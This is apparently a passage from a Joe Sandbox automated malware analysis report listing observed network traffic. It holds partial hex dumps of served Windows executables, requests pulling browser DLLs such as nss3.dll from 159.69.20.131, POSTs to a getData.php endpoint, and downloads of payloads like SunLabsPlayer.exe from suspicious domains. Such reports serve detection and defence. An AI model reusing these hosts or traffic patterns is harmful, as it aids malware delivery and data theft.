      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:23:07 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Thu, 24 Jun 2021 20:23:07 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:23:08 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Thu, 24 Jun 2021 20:23:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 
0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:23:12 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Thu, 24 Jun 2021 20:23:12 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:23:13 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Thu, 24 Jun 2021 20:23:13 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 
74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: POST /865 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 159.69.20.131Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /932 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 159.69.20.131Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 159.69.20.131Connection: Keep-Alive
      Source: Joe Sandbox View | IP Address: 136.144.41.152
      Source: Joe Sandbox View | IP Address: 185.20.227.194
      Source: Joe Sandbox View | ASN Name: WORLDSTREAMNL
      Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
      Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 113Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: HEAD /WW/file2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file9.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file8.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file4.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /downloads/toolspab2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: freeprivacytoolsforyou.xyzCache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /campaign1/SunLabsPlayer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: nicepricingsaleregistration.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: HEAD /WW/file6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: freeprivacytoolsforyou.xyzCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file9.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /campaign1/SunLabsPlayer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: nicepricingsaleregistration.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file8.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file4.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
